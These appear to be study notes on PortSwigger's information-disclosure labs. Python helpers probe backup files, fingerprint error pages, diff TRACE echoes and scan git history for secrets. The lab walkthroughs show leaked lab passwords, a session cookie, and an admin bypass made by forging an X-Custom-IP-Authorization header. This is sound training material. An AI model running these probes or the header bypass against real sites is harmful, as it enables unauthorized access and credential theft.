What is Information Disclosure?
Examples:
Some basic examples of information disclosure are as follows:
- Revealing the names of hidden directories, their structure, and their contents via a `robots.txt` file or directory listing
- Providing access to source code files via temporary backups
- Explicitly mentioning database table or column names in error messages
- Unnecessarily exposing highly sensitive information, such as credit card details
- Hard-coding API keys, IP addresses, database credentials, and so on in the source code
- Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behavior
Files for Web Crawlers
Files such as `/robots.txt` and `/sitemap.xml` can contain sensitive information:
```ad-quote
Many websites provide files at `/robots.txt` and `/sitemap.xml` to help crawlers navigate their site. Among other things, these files often list specific directories that the crawlers should skip, for example, because they may contain sensitive information.
```
Directory Listings
If the web server is configured to list the contents of directories, we can use the listing to locate resources, and sometimes even reach hidden files, without any directory brute-forcing:
Web servers can be configured to automatically list the contents of directories that do not have an index page present. This can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analyzing and attacking those resources. It particularly increases the exposure of sensitive files within the directory that are not intended to be accessible to users, such as temporary files and crash dumps.
On its own this is not a bug: a listing only tells us where resources are, it does not necessarily let us access every one of them. It becomes an issue when access control is missing:
Directory listings themselves are not necessarily a security vulnerability. However, if the website also fails to implement proper access control, leaking the existence and location of sensitive resources in this way is clearly an issue.
Developer Comments
Developer comments can also contain sensitive information:
During development, in-line HTML comments are sometimes added to the markup.
Occasionally, these comments contain information that is useful to an attacker. For example, they might hint at the existence of hidden directories or provide clues about the application logic.
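Both of the sources above (crawler files and leftover HTML comments) can be harvested mechanically. The following helper is an added example, not code from the original page or from PortSwigger; the `robots.txt` and HTML inputs are constructed samples, and the paths they contain (`/backup`, `/admin-old/`, `/cgi-bin/phpinfo.php`, `/api/v1/export`) are made up for illustration:

```python
import re
from typing import List

# Constructed sample inputs (not taken from any real site). They mimic what the
# text describes: a robots.txt that points at a directory crawlers should skip,
# and markup in which a developer commented out a link rather than removing it.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /backup
Disallow: /admin-old/   # legacy panel
Allow: /public
Sitemap: https://example.invalid/sitemap.xml
"""

SAMPLE_HTML = """<html><body>
<!-- TODO: remove before release <a href=/cgi-bin/phpinfo.php>Debug</a> -->
<a href="/product?productId=1">Product</a>
<!-- old endpoint: /api/v1/export?format=csv -->
</body></html>
"""

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# A path inside a comment: either an href/src attribute value, or a bare absolute
# path not preceded by a word character, '/' or '<' (so the "/a" in "</a>" is ignored).
PATH_RE = re.compile(r"""(?:href|src)\s*=\s*["']?([^\s"'>]+)|(?<![\w/<])(/[\w./?=&%-]+)""")


def robots_disallowed(text: str) -> List[str]:
    """Return every path under a Disallow directive: the places the site asks crawlers to avoid."""
    paths: List[str] = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # robots.txt allows trailing comments
        if line.lower().startswith("disallow:"):
            path = line.split(":", 1)[1].strip()
            if path and path not in paths:
                paths.append(path)
    return paths


def paths_in_comments(html: str) -> List[str]:
    """Return URL paths that occur inside HTML comments, in document order."""
    found: List[str] = []
    for comment in COMMENT_RE.findall(html):
        for m in PATH_RE.finditer(comment):
            path = m.group(1) or m.group(2)
            if path not in found:
                found.append(path)
    return found


def candidate_paths(robots_txt: str, html: str) -> List[str]:
    """Merge both sources into one de-duplicated list of paths worth requesting directly."""
    merged: List[str] = []
    for path in robots_disallowed(robots_txt) + paths_in_comments(html):
        if path not in merged:
            merged.append(path)
    return merged


if __name__ == "__main__":
    for p in candidate_paths(SAMPLE_ROBOTS, SAMPLE_HTML):
        print(p)
```

The output list is the set of paths to request next; whether each one is a finding depends on what the server does when it is requested (a directory listing, a debug page, a 403), which is the check the following sections describe.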
Error Messages
Error messages can reveal what data type a parameter expects:
The content of error messages can reveal information about what input or data type is expected from a given parameter. This can help you to narrow down your attack by identifying exploitable parameters.
Information about the technologies in use, and their versions, lets us look for known vulnerabilities to exploit:
Verbose error messages can also provide information about different technologies being used by the website. For example, they might explicitly name a template engine, database type, or server that the website is using, along with its version number.
This information can be useful because you can easily search for any documented exploits that may exist for this version. Similarly, you can check whether there are any common configuration errors or dangerous default settings that you may be able to exploit. Some of these may be highlighted in the official documentation.
If the application uses an open-source framework, we can study its source code to build an exploit:
You might also discover that the website is using some kind of open-source framework. In this case, you can study the publicly available source code, which is an invaluable resource for constructing your own exploits.
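Pulling the useful pieces out of a verbose error page (exception type, stack-frame classes, product banner with version) is the step that turns a 500 response into search terms. This is an added example, not code from the page or from any vendor; the error body is constructed to have the same shape as the lab response and the application class `com.example.shop.ProductController` is invented:

```python
import re
from typing import Dict, List, Optional

# Constructed error response (not a capture from a real server). It has the
# shape the lab response takes: a Java stack trace followed by a product banner.
SAMPLE_ERROR = """HTTP/2 500 Internal Server Error
Content-Length: 1674

Internal Server Error: java.lang.NumberFormatException: For input string: "a"
\tat java.base/java.lang.NumberFormatException.forInputString(NumberFormatException.java:67)
\tat java.base/java.lang.Integer.parseInt(Integer.java:661)
\tat com.example.shop.ProductController.show(Unknown Source)
Apache Struts 2 2.3.31
"""

STATUS_RE = re.compile(r"^HTTP/\S+\s+(\d{3})")
# Fully qualified exception class: lower-case package segments, then a capitalised class name.
EXCEPTION_RE = re.compile(r"\b((?:[a-z_]\w*\.)+[A-Z]\w*(?:Exception|Error))\b")
# "at [module/]package.Class.method(" -> the class; the module prefix (java.base/) is dropped.
FRAME_RE = re.compile(r"^\s*at\s+(?:[\w.]+/)?([\w.$]+)\.[\w$<>]+\(", re.M)
# Product banners followed by a version number; extend the alternation as needed.
BANNER_RE = re.compile(r"\b(Apache Struts 2|Apache Tomcat|Spring Boot|Jetty|nginx|PHP)[ /]v?(\d+(?:\.\d+)+)")
# Frames under these prefixes are platform code; everything else names the application's own packages.
PLATFORM_PREFIXES = ("java.", "javax.", "jdk.", "sun.", "org.apache.", "org.springframework.")


def _dedupe(items):
    """Keep first occurrence of each item, preserving order."""
    return list(dict.fromkeys(items))


def fingerprint_error(body: str) -> Dict[str, object]:
    """Extract the parts of an error page that narrow an attack: status, exception type,
    stack-frame classes (application namespaces especially) and product/version banners."""
    m = STATUS_RE.match(body)
    status: Optional[int] = int(m.group(1)) if m else None
    frames: List[str] = _dedupe(FRAME_RE.findall(body))
    return {
        "status": status,
        "exceptions": _dedupe(EXCEPTION_RE.findall(body)),
        "frames": frames,
        "app_classes": [c for c in frames if not c.startswith(PLATFORM_PREFIXES)],
        "technologies": _dedupe(BANNER_RE.findall(body)),
    }


if __name__ == "__main__":
    for key, value in fingerprint_error(SAMPLE_ERROR).items():
        print(f"{key}: {value}")
```

The `exceptions` entry tells you what input the parameter expects (a `NumberFormatException` from `Integer.parseInt` means an integer), `app_classes` reveals the application's own package layout, and `technologies` gives the exact product and version string to search advisories and default-configuration notes for.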
Lab: Information Disclosure in Error Messages
Send the following request:
```http
GET /product?productId=a HTTP/2
Host: 0a2d007c040aed55804b1c9e00490026.web-security-academy.net
```
The response is a full stack trace, and its last line reveals that the server runs Apache Struts 2 2.3.31:
```http
HTTP/2 500 Internal Server Error
Content-Length: 1674

Internal Server Error: java.lang.NumberFormatException: For input string: "a"
    at java.base/java.lang.NumberFormatException.forInputString(NumberFormatException.java:67)
    at java.base/java.lang.Integer.parseInt(Integer.java:661)
    at java.base/java.lang.Integer.parseInt(Integer.java:777)
    at lab.i.h.y.n.D(Unknown Source)
    at lab.h.o.b.d.u(Unknown Source)
    at lab.h.o.e.h.z.c(Unknown Source)
    at lab.h.o.e.c.lambda$handleSubRequest$0(Unknown Source)
    at f.x.f.x.lambda$null$3(Unknown Source)
    at f.x.f.x.Y(Unknown Source)
    at f.x.f.x.lambda$uncheckedFunction$4(Unknown Source)
    at java.base/java.util.Optional.map(Optional.java:260)
    at lab.h.o.e.c.F(Unknown Source)
    at lab.server.l.z.z.s(Unknown Source)
    at lab.h.o.k.F(Unknown Source)
    at lab.h.o.k.s(Unknown Source)
    at lab.server.l.z.v.j.s(Unknown Source)
    at lab.server.l.z.v.a.lambda$handle$0(Unknown Source)
    at lab.i.m.r.x.s(Unknown Source)
    at lab.server.l.z.v.a.Y(Unknown Source)
    at lab.server.l.z.n.m(Unknown Source)
    at f.x.f.x.lambda$null$3(Unknown Source)
    at f.x.f.x.Y(Unknown Source)
    at f.x.f.x.lambda$uncheckedFunction$4(Unknown Source)
    at lab.server.ph.p(Unknown Source)
    at lab.server.l.z.n.z(Unknown Source)
    at lab.server.l.b.c.W(Unknown Source)
    at lab.server.l.u.r(Unknown Source)
    at lab.server.l.s.r(Unknown Source)
    at lab.server.g.K(Unknown Source)
    at lab.server.g.j(Unknown Source)
    at lab.z.q.lambda$consume$0(Unknown Source)
    at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
    at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
    at java.base/java.lang.Thread.run(Thread.java:1583)
Apache Struts 2 2.3.31
```
Debugging Data
Debug output can contain sensitive information:
Debug messages can sometimes contain vital information for developing an attack, including:
- Values for key session variables that can be manipulated via user input
- Hostnames and credentials for back-end components
- File and directory names on the server
- Keys used to encrypt data transmitted via the client
This data is sometimes written to a separate file; an attacker who can read that file learns how the application works internally:
Debugging information may sometimes be logged in a separate file. If an attacker is able to gain access to this file, it can serve as a useful reference for understanding the application's runtime state.
Lab: Information Disclosure on Debug Page
The following comment was found in the source of the / page:
```html
<!-- <a href=/cgi-bin/phpinfo.php>Debug</a> -->
```
Visiting it shows a PHP info (phpinfo) page. The secret key is listed in its Environment section.
Source Code Disclosure via Backup Files
Access to the source code helps an attacker understand the application well enough to build high-severity exploits. It can also expose hard-coded sensitive data:
Obtaining source code access makes it much easier for an attacker to understand the application's behavior and construct high-severity attacks. Sensitive data is sometimes even hard-coded within the source code. Typical examples of this include API keys and credentials for accessing back-end components.
How source code can be read through backup files:
When a server handles files with a particular extension, such as `.php`, it will typically execute the code, rather than simply sending it to the client as text.
However, in some situations, you can trick a website into returning the contents of the file instead. For example, text editors often generate temporary backup files while the original file is being edited. These temporary files are usually indicated in some way, such as by appending a tilde (`~`) to the filename or adding a different file extension. Requesting a code file using a backup file extension can sometimes allow you to read the contents of the file in the response.
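A probe for this needs two things: the list of backup names to try for a given file, and a way to tell an unexecuted source file apart from the rendered page the same URL normally returns. The code below is an added example, not from the page or from PortSwigger. The suffix list is a common-editor heuristic, not exhaustive; the fake server, the `/config.php` path and the credentials inside it are all constructed:

```python
import posixpath
import re
from typing import Callable, List, Optional, Tuple

# Suffixes left behind by editors, deploy scripts and hand-made copies (heuristic, not exhaustive).
BACKUP_SUFFIXES = ["~", ".bak", ".old", ".orig", ".save", ".txt", ".1"]


def backup_candidates(path: str) -> List[str]:
    """Derive likely backup/temporary names for a code file, e.g. /config.php -> /config.php~,
    /config.php.bak, /.config.php.swp (Vim swap), /#config.php# (Emacs autosave)."""
    directory, name = posixpath.split(path)
    names = [name + s for s in BACKUP_SUFFIXES]
    names += [f".{name}.swp", f".{name}.swo", f"#{name}#"]
    return [posixpath.join(directory, n) for n in names]


# Markers that say "this body is source, not the output of running it".
SOURCE_MARKERS = [
    ("php", re.compile(r"<\?php\b")),
    ("jsp", re.compile(r"<%@\s*page\b")),
    ("java", re.compile(r"^\s*(?:package|import)\s+[\w.]+\s*;", re.M)),
    ("python", re.compile(r"^\s*(?:import\s+\w+|from\s+\w+\s+import\b)", re.M)),
]


def classify_source(body: str) -> Optional[str]:
    """Return a language label if the body looks like unexecuted source code, else None."""
    for label, pattern in SOURCE_MARKERS:
        if pattern.search(body):
            return label
    return None


# name = "value", name: 'value', define('API_KEY', "value") with a secret-looking identifier.
SECRET_RE = re.compile(
    r"""(?i)(\w*(?:pass(?:word|wd)?|secret|api[_-]?key|token)\w*)["']?\s*[=:,]\s*["']([^"']{6,})["']"""
)


def find_hardcoded_secrets(source: str) -> List[Tuple[str, str]]:
    """Return (identifier, value) pairs that look like credentials embedded in the source."""
    return [(m.group(1), m.group(2)) for m in SECRET_RE.finditer(source)]


Fetch = Callable[[str], Tuple[int, str]]   # url -> (status, body)


def find_backups(fetch: Fetch, path: str) -> List[Tuple[str, str]]:
    """Request each candidate and keep those whose 200 response reads as source code."""
    hits: List[Tuple[str, str]] = []
    for url in backup_candidates(path):
        status, body = fetch(url)
        if status == 200:
            lang = classify_source(body)
            if lang:
                hits.append((url, lang))
    return hits


# Constructed fake site so the example runs offline: the live file executes and
# returns HTML, while the editor backup is served verbatim. Credentials are made up.
SAMPLE_RENDERED = "<html><body><h1>Shop</h1></body></html>"
SAMPLE_BACKUP = """<?php
$db_host = "localhost";
$db_user = "shop";
$db_pass = "Winter2024-not-real";
define('API_KEY', "sk_test_0000000000000000");
?>"""
FAKE_SERVER = {"/config.php": (200, SAMPLE_RENDERED), "/config.php~": (200, SAMPLE_BACKUP)}


def fake_fetch(url: str) -> Tuple[int, str]:
    return FAKE_SERVER.get(url, (404, ""))


if __name__ == "__main__":
    for url, lang in find_backups(fake_fetch, "/config.php"):
        print(url, lang, find_hardcoded_secrets(FAKE_SERVER[url][1]))
```

Against a real target, replace `fake_fetch` with a function that performs the HTTP request; the classification step matters because many servers answer every unknown path with a 200 and an HTML error page, which would otherwise count as a hit.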
Reading the source code is also the step that makes otherwise hard-to-find bugs, such as insecure deserialization, discoverable:
Once an attacker has access to the source code, this can be a huge step towards being able to identify and exploit additional vulnerabilities that would otherwise be almost impossible. One such example is insecure deserialization.
Lab: Source Code Disclosure via Backup Files
The contents of /robots.txt, used to find a hidden directory[^1]:
```text
User-agent: *
Disallow: /backup
```
Visiting /backup shows that the web server lists the directory, as described under Directory Listings. The database password is found in the following code:
```java
ConnectionBuilder connectionBuilder = ConnectionBuilder.from(
        "org.postgresql.Driver",
        "postgresql",
        "localhost",
        5432,
        "postgres",
        "postgres",
        "j1h7pr0sb5hw5xzz14e8s8sqm76m9hd9"   // hard-coded database password
).withAutoCommit();
```
Information Disclosure Due to Insecure Configuration
Using third-party components without understanding their configuration options, or misconfiguring them, can also leak information:
Websites are sometimes vulnerable as a result of improper configuration. This is especially common due to the widespread use of third-party technologies, whose vast array of configuration options are not necessarily well-understood by those implementing them.
Example:
For example, the HTTP `TRACE` method is designed for diagnostic purposes. If enabled, the web server will respond to requests that use the `TRACE` method by echoing in the response the exact request that was received. This behavior is often harmless, but occasionally leads to information disclosure, such as the name of internal authentication headers that may be appended to requests by reverse proxies.
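The useful information in a TRACE response is the difference between what you sent and what the back end received. The code below is an added example, not from the page or from PortSwigger: it parses both copies of the request and reports headers that were added or rewritten in transit, then builds the follow-up request carrying the discovered header. The request/response pair is constructed; the header name `X-Custom-IP-Authorization` is the one from the lab, and `203.0.113.7` is a documentation address, not a real client IP:

```python
from typing import Dict, Tuple

# Constructed request and echoed copy, not a capture. The echo is what a
# TRACE-enabled origin sends back after a reverse proxy rewrote Host and
# appended an internal header.
SENT_REQUEST = (
    "TRACE /admin HTTP/2\r\n"
    "Host: shop.example\r\n"
    "Cookie: session=abc123\r\n"
    "User-Agent: probe/1.0\r\n"
    "\r\n"
)
ECHOED_REQUEST = (
    "TRACE /admin HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "user-agent: probe/1.0\r\n"
    "cookie: session=abc123\r\n"
    "Content-Length: 0\r\n"
    "X-Custom-IP-Authorization: 203.0.113.7\r\n"
    "\r\n"
)


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw request into (request line, {lower-cased header name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return lines[0], headers


def injected_headers(sent: str, echoed: str) -> Dict[str, str]:
    """Headers in the echoed request that we never sent: added by a proxy or the server."""
    _, sent_h = parse_request(sent)
    _, echoed_h = parse_request(echoed)
    return {k: v for k, v in echoed_h.items() if k not in sent_h}


def rewritten_headers(sent: str, echoed: str) -> Dict[str, Tuple[str, str]]:
    """Headers whose value changed in transit, as name -> (sent value, echoed value)."""
    _, sent_h = parse_request(sent)
    _, echoed_h = parse_request(echoed)
    return {k: (sent_h[k], echoed_h[k]) for k in sent_h if k in echoed_h and sent_h[k] != echoed_h[k]}


def with_headers(raw: str, extra: Dict[str, str]) -> str:
    """Return the raw request with extra headers appended to its header block."""
    head, _, body = raw.partition("\r\n\r\n")
    added = "".join(f"\r\n{name}: {value}" for name, value in extra.items())
    return f"{head}{added}\r\n\r\n{body}"


if __name__ == "__main__":
    print("added in transit:", injected_headers(SENT_REQUEST, ECHOED_REQUEST))
    print("rewritten:", rewritten_headers(SENT_REQUEST, ECHOED_REQUEST))
    # Bypass attempt: send the internal header ourselves with a loopback value.
    print(with_headers(SENT_REQUEST.replace("TRACE", "GET", 1),
                       {"X-Custom-IP-Authorization": "127.0.0.1"}))
```

Whether the supplied header is honoured depends on the front end: a proxy that strips or overwrites client-supplied copies of its internal header closes the bypass, so the result of the forged request, not the presence of the header in the echo, is the actual finding.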
Lab: Authentication Bypass via Information Disclosure
Visiting /admin returns the following message:
`Admin interface only available to local users`
Send the same request with the TRACE method:
```http
TRACE /admin HTTP/2
Host: 0a8100e6047fdb1881486b15009a0071.web-security-academy.net
Cookie: session=2DYbY8WivseEjKMS80TzuuqSUG7yt4TR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
```
The response echoes the request as the back end received it, including an internal header that we did not send:
```http
TRACE /admin HTTP/1.1
Host: localhost
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-language: en-US,en;q=0.8,vi-VN;q=0.5,vi;q=0.3
accept-encoding: gzip, deflate, br
dnt: 1
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: same-origin
sec-fetch-user: ?1
priority: u=0, i
te: trailers
cookie: session=2DYbY8WivseEjKMS80TzuuqSUG7yt4TR
Content-Length: 0
X-Custom-IP-Authorization: 58.186.47.102
```
An IP address lookup confirms that this value is our own public IP, so the proxy appends the client address in `X-Custom-IP-Authorization` and the admin check trusts it. Supplying the header ourselves with the value 127.0.0.1 (`X-Custom-IP-Authorization: 127.0.0.1`) on a request to /admin grants access to the admin page.
Version Control History
If the website exposes its `.git` directory, we can use it to read the source-code diffs and look for sensitive information:
There are various methods for downloading the entire `.git` directory. You can then open it using your local installation of Git to gain access to the website's version control history. This may include logs containing committed changes and other interesting information.
This might not give you access to the full source code, but comparing the diff will allow you to read small snippets of code. As with any source code, you might also find sensitive data hard-coded within some of the changed lines.
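Once the repository is local, the quickest way to find such snippets is to scan `git log -p` for changed lines that assign a literal to a secret-looking name; a commit titled "remove password" is itself a pointer, because the removed line is still in the history. The scanner below is an added example, not code from the page or from PortSwigger. Its input is a constructed `git log -p` transcript with the same two-commit shape as the lab (fake hashes, fake author, a placeholder value rather than the lab's real password):

```python
import re
from typing import List, Tuple

# Constructed `git log -p` output (not the lab's real history): one commit adds a
# config file containing a credential, a later commit "removes" it. Hashes,
# author and the secret value are placeholders.
SAMPLE_GIT_LOG = """commit 2222222222222222222222222222222222222222
Author: Dev <dev@example.invalid>
Date:   Tue Jun 23 14:05:07 2020 +0000

    Remove admin password from config

diff --git a/admin.conf b/admin.conf
index 1111111..2222222 100644
--- a/admin.conf
+++ b/admin.conf
@@ -1 +1 @@
-ADMIN_PASSWORD=placeholder-not-a-real-secret
+ADMIN_PASSWORD=${ADMIN_PASSWORD}

commit 1111111111111111111111111111111111111111
Author: Dev <dev@example.invalid>
Date:   Mon Jun 22 16:23:42 2020 +0000

    Add skeleton admin panel

diff --git a/admin.conf b/admin.conf
new file mode 100644
index 0000000..1111111
--- /dev/null
+++ b/admin.conf
@@ -0,0 +1 @@
+ADMIN_PASSWORD=placeholder-not-a-real-secret
"""

# A changed line assigning a literal to a secret-looking name. Values that are
# references rather than literals (${VAR}, env(...)) are excluded by the character class.
SECRET_LINE_RE = re.compile(
    r"""(?i)^([+-])\s*([\w.]*(?:password|passwd|secret|api[_-]?key|token)[\w.]*)\s*[=:]\s*["']?([^"'\s${}()]{8,})"""
)

Finding = Tuple[str, str, str, str, str]   # (short commit, file, +/-, name, value)


def scan_git_log(log: str) -> List[Finding]:
    """Walk `git log -p` output and report every added or removed line carrying a secret-looking literal."""
    findings: List[Finding] = []
    commit = path = ""
    for line in log.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:7]
        elif line.startswith("diff --git "):
            path = line.split(" b/", 1)[1]          # "diff --git a/x b/x" -> "x"
        elif line.startswith(("+++", "---")):
            continue                                 # file headers, not content
        else:
            m = SECRET_LINE_RE.match(line)
            if m:
                findings.append((commit, path, m.group(1), m.group(2), m.group(3)))
    return findings


def recoverable_secrets(findings: List[Finding]) -> List[str]:
    """Distinct values present anywhere in history; a later '-' line does not take them back."""
    return list(dict.fromkeys(value for *_, value in findings))


if __name__ == "__main__":
    for commit, path, sign, name, value in scan_git_log(SAMPLE_GIT_LOG):
        print(f"{commit} {path} {sign}{name}={value}")
    print("still recoverable:", recoverable_secrets(scan_git_log(SAMPLE_GIT_LOG)))
```

Run it on real output with `git log -p --all` piped into a file, since the interesting line may live on a branch other than the one checked out; for a full clone, a purpose-built tool such as gitleaks or trufflehog covers far more patterns than the single regex here.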
Lab: Information Disclosure in Version Control History
Visiting /.git shows the repository's directory tree in a listing. Using the tool git-dumper to download the `.git` directory gives the following local structure:
```text
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d----           4/22/2025  9:44 PM                .git
-a---           4/22/2025  9:42 PM             88 admin_panel.php
-a---           4/22/2025  9:44 PM             37 admin.conf
```
Running `git log` shows two commits, and the message of the newer one points straight at the leak:
```text
> git log
commit df2d2da9d64d65b73580870e2fb3b4089f5e53ba (HEAD -> master)
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date:   Tue Jun 23 14:05:07 2020 +0000

    Remove admin password from config

commit f06fbbfeb511afea2f5e0c5046b31a2de3bc5de1
Author: Carlos Montoya <carlos@carlos-montoya.net>
Date:   Mon Jun 22 16:23:42 2020 +0000

    Add skeleton admin panel
```
Checking out commit f06fbbfeb511afea2f5e0c5046b31a2de3bc5de1 and viewing admin.conf reveals the password:
```text
> cat admin.conf
ADMIN_PASSWORD=zh8wbu8ke4cdcvnk3e29
```
Logging in as administrator:zh8wbu8ke4cdcvnk3e29 and deleting the user carlos completes the lab.
Resources
Footnotes
[^1]: See Files for Web Crawlers.